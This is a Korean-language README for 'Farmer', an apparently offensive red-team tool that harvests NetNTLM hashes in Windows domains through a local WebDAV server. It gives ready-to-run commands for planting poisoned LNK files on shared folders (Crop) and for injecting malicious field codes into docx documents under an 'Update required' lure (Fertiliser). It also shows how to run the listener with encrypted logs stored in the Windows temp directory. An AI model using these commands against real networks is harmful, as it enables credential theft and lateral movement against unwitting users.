
로컬 WebDAV 서버를 통해 Windows 도메인에서 NetNTLM 해시를 수집하며, 측면 이동 및 자격 증명 캡처를 위해 LNK 파일 포이즈닝과 Office 문서 필드 코드 삽입을 사용합니다.
작성자: @domchell
나는 농부가 되고 싶어서 해시를 수확하기 시작했습니다
Farmer는 Windows 도메인에서 NetNTLM 해시를 수집하기 위한 프로젝트입니다. Farmer는 로컬 WebDAV 서버를 생성하여 WebDAV 미니 리디렉터가 연결하는 모든 클라이언트에서 인증하도록 만듭니다.
Farmer가 성공하려면 클라이언트가 로컬 WebDAV 서버에 연결할 수 있어야 합니다. 이를 방해할 수 있는 요소로는 네트워크 분할 및/또는 Windows 방화벽이 있습니다. 먼저 이를 확인하십시오(힌트 Seatbelt WindowsFirewall).
Farmer에는 Crop 도구의 하위 모듈이 포함되어 있습니다. 이 도구를 사용하면 LNK 파일을 만들어 폴더를 탐색할 때 WebDAV 연결을 시작할 수 있습니다. 이는 LNK가 저장된 아이콘을 렌더링하려고 시도하기 때문입니다.
공격의 개념은 다음과 같습니다. Crop을 사용하여 원하는 파일 공유에 Farmer WebDAV 서버를 가리키는 LNK 파일을 주입합니다.
예를 들어:
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest
사용자가 \fileserver\Common을 탐색하면 탐색기가 Farmer WebDAV 서버에서 아이콘을 복구하려고 시도하고, 그 과정에서 사용자의 NetNTLM 해시를 제출합니다.
Farmer에는 Fertiliser 도구의 또 다른 하위 모듈이 포함되어 있습니다. 이 도구를 사용하면 Office 문서(현재는 docx만)에 악성 필드 코드를 주입할 수 있습니다. 문서를 열면 필드 코드가 구문 분석되어 선택한 WebDAV 서버로 해시가 유출됩니다. :)
예를 들어:
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"
Farmer는 사용자 정의 포트에서 지정된 시간(초) 동안 수신 대기하며, 필요한 경우 출력을 파일 시스템에 기록합니다.
사용법:
farmer.exe <port> [seconds] [output]
초를 지정하지 않거나 0으로 설정하면 Farmer가 무기한 실행됩니다. 예를 들어:
farmer.exe 8888 0 c:\windows\temp\test.tmp
포트 8888에서 1분 동안 Farmer를 실행하려면 다음을 수행하십시오:
farmer.exe 8888 60
Farmer 로그를 파일 시스템에 기록하려면 Config.key에 설정된 키를 사용하여 AES로 로그 파일을 암호화하고 encrypt bool을 true(기본값 false)로 설정할 수 있습니다.
로그 파일은 HarvestCrop 도구로 복호화할 수 있습니다. 예를 들어:
harvestcrop.exe c:\windows\temp\test.tmp farmer